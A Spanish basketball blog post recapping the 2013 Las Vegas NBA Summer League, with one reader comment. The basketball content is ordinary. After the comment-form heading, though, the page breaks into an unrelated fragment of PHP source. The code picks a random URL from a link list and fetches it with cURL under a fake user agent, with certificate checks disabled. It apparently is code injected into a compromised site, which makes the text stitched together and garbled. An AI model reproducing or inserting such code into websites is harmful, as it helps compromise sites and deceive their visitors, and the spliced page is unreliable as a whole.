Se acabó la Summer League de las Vegas

23 de July de 2013 por rumbero

Se acabó lo que se daba. Ayer terminaba la Summer League de las Vegas con la final disputada entre Warriors y Suns que se llevaban los primeros ante la exhibición anotadora de un rookie sin equipo de nombre Ian Clark (91-77). Posiblemente hayan sido  los dos equipos que más en serio se hayan tomado el torneo, jugando con mucho sophomore y sin dar demasiadas concesiones de minutos. Ambos dieron cuenta en semifinales de unos descafeinados Bobcats y unos peleones Heat que acabaron hincando la rodilla por culpa de una canasta de Marcus Morris a poco más de 20 segundos.

Antes de esto tuvimos una serie de eliminatorias, que empezaron el miércoles y terminaron ayer con la final, y que los más frikis e interesados del lugar podéis consultar aquí. A destacar unos Cavs que reservaron a Waiters y Zeller y que les costó caer eliminados, los Bulls que venían tirando como nadie pero que se quedaron en un 30% el día que no tocaba, McCollum y sus Blazers, las escopetas de feria que tienen en Memphis, la bipolaridad de Mclemore… Ahí va lo más destacados de estos últimos días. Si echáis en falta a algún jugador no sufráis que seguramente nos entretendremos con él en el resumen especial que haremos en los próximos días de las Summer League de Orlando y Las Vegas.

DESTACADOS

Ken Bazemore: El líder de los Warriors en esta SL. El sábado se deshizo de los Lakers con 26 puntos, en las semis contra Bobcats no fue tan decisivo ante la ayuda de Green y Cameron Jones y ayer volvió a mandar y aportar en los dos lados con 18 puntos, 4 rebotes, 5 rebotes, 2 robos y 3 pérdidas para ganar el partido. Podría haberse llevado el MVP del torneo pero finalmente se lo han otorgado a Valanciunas, suponemos que ante la amenaza que se comiera a los organizadores y patrocinadores del torneo si no se lo daban. 

Ian Clark: Le hemos ido siguiendo durante la SL por su buena mano y esta madrugada nos ha dado la razón explotando con 33 puntazos (12/19 FG y 7/19 3p). El MVP de la final sigue sin equipo. Los que están buscando un tirador a buen precio no sabemos a qué están esperando.

Morris Twins: Si Bazemore ha sido el líder de los GSW estos dos han llevado a los Suns a la final. Destrozaron a los Raptors el sábado con una soberbia actuación conjunta y fueron también los mejores junto con PJ Tucker en la semifinal contra Miami. Ayer Markieff no tuvo el día pero han demostrado su buena capacidad atlética y recursos como un buen tiro de media distancia y mucha intensidad.

Archie Goodwin: Muy bien el chaval en esta fase final. Ha ido afinando en la selección de tiro conforme avanzaban los partidos y se ha mostrado muy activo en ataque y defensa. 18 puntos (6/11 FG) 3 rebotes, 1 asistencia, 4 pérdidas en la final. Recordemos que es del 94. Nos dejó alguna perla (o churro) como esta (aunque no valiera)

Dwight Buycks: Otro al que le hemos ido siguiendo la pista durante toda la SL. Sus dos últimos partidos con los Raptors han sido sobresalientes (18/6/10 y 28/2/4). Muchas ganas acompañadas de buenas maneras. Se ha ganado su contrato a pulso.

Mike Scott: 18.6 puntos y 6.2 rebotes en 27 minutos. Veremos la bola que le dan en los Hawks al sophomore pero ha demostrado buenos recursos ofensivos durante la SL. Eso sí, se llevó el póster del torneo a manos de McLemore.

Austin Rivers: Summer League para creer en Rivers. Que es bastante chupón ya lo sabíamos y que durante la regular no va a tener ni la mitad de bola también pero se ha visto con galones y ha dado muestras de su talento ofensivo. Cerró su participación en el torneo con 23 puntos

CJ McCollum: ¿Hemos dicho ya que nos gusta McCollum? En estos partidos finales no ha estado tan acertado aunque haya asumido el mismo número de tiros. Por momentos los partidos de los Blazers han sido monólogos de bloqueos y que se le juegue el chaval pero soltura y calidad no le faltan.

A SEGUIR

James Ennis: Buena SL en general del rookie de Miami. Le vimos ya en Orlando y ha estado especialmente bien estos últimos días. Casi se carga a los Suns con 25 puntos y 9 rebotes el domingo pero no pudo ser. Pinta a mejor jugador que una elección 50 pero veremos que hacen los Heat con él.

Reggie Bullock: 22 puntos, 4 rebotes y 2 asistencias para despedirse del torneo. Se ha mostrado como un buen anotador al que no se le arruga la mano. Ya hemos comentado muchas veces lo difícil que lo va a tener en los Clippers pero no deja de parecernos un jugador de rol interesante.

Jeremy Tyler: Otro que ha estado con muchas ganas todo el torneo. Ha promediado 12.8 puntos y 6.4 rebotes en 17 minutos y en sus dos últimos partidos se ha ido a más de 18. Le va a servir para hacer el training camp con los Knicks

Nate Wolters: No ha hecho un buen torneo pero lo terminó con su mejor actuación ante los Wizards: 20 puntos (8/13 FG), 5 rebotes, 3 asistencias y 2 pérdidas para mostrar algo de su buen repertorio en ataque.

Gal Mekel: Oficialmente ya jugador de los Mavs, ha jugado un torneo más que bueno, ganando confianza partido a partido y mejorando  en la dirección de juego. Veremos si tiene oportunidades.

DECEPCIONES

Evan Fournier: Algunos sophomores se lo han tomado más en serio que otros, eso está claro. Viendo algunos partidos de Fournier al final de la RS del año pasado esperábamos algo más la verdad. Muy gris y con pocas “ganas”.

Tony Wroten: Capaz de lo mejor y (más asiduamente) de lo peor. Si hay que tirarse 15 tiros por partido independientemente del resultado este es nuestro hombre.

Shabazz Muhammad: Exceptuando un partido en el que estuvo especialmente fino en el tiro el resto han sido actuaciones calcadas y no se puede decir que hayan sido buenas. Que sí, que el chaval no va de estrella tirándoselo todo e intenta aportar en equipo pero le va a costar muchos entrenamientos para llegar a convertirse en esta clase de jugador ya que de momento aporta poco en este sentido.

Josh Akognon: Venía anotando de manera excepcional pero en su partido contra los Warriors se quedó en un 1/14. Poco después fue cortado por los Mavs…

Que los Bobcats no hayan ganado la SL de las Vegas: Sabemos que aquí se trata de ver a cuantos más chavales mejor, que importa poco si pierde de 2 o de 20 y que al fin y al cabo es una toma de contacto para la mayoría pero nos hubiera gustado ver a los Bobcats en semis con Zeller, Taylor, Kidd-Glischrist y Biyombo dando cuenta de GSW. No todos los días (y menos los Bobcats) se lleva uno un torneo.

Comenta

Un comentario a esta entrada

  1. Sancho88 dice:
    #1

    Enorme resumen Rumbero, hay que tener narices para hacerse los resúmenes de las SL todos los días. Coincido con muchas cosas, Valanciunas MVP puede ser, pero Bazemore también lo merecía. Tenemos jugador para rato, suplente de Iggy o Klay Thompson, pero que les resuelve una papeleta a los Warriors increíble. Será el campeonato de Las Vegas premonitorio de lo que va a pasar en la temporada con los Warriors? Desde luego que pueden dominar a un gran nivel y ser aspirantes a todo en el Oeste. Yo veo una final Warriors-OKC.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>